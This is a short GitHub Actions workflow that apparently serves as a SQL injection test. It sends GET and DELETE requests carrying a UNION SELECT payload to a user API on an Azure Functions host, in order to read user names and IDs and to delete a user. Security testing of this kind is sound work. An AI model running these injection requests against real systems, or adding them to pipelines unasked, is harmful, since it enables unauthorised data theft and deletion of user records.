name: Sql-Injection-Delete-Users
on: [delete]

jobs:
  injection-test:
    name: SQL Injection Test
    runs-on: ubuntu-latest

    steps:
      - name: Get Sources
        uses: actions/checkout@v2
      - name: GET All users and userid
        uses: satak/webrequest-action@master
        with:
          url: 'https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION select user, userid from users'
          method: GET
      - name: DELETE a user
        uses: satak/webrequest-action@master
        with:
          url: 'https://nsc-func-dev-usw2-tuesday.azurewebsites.net/api/users/14641 UNION select user, userid from users'
          method: DELETE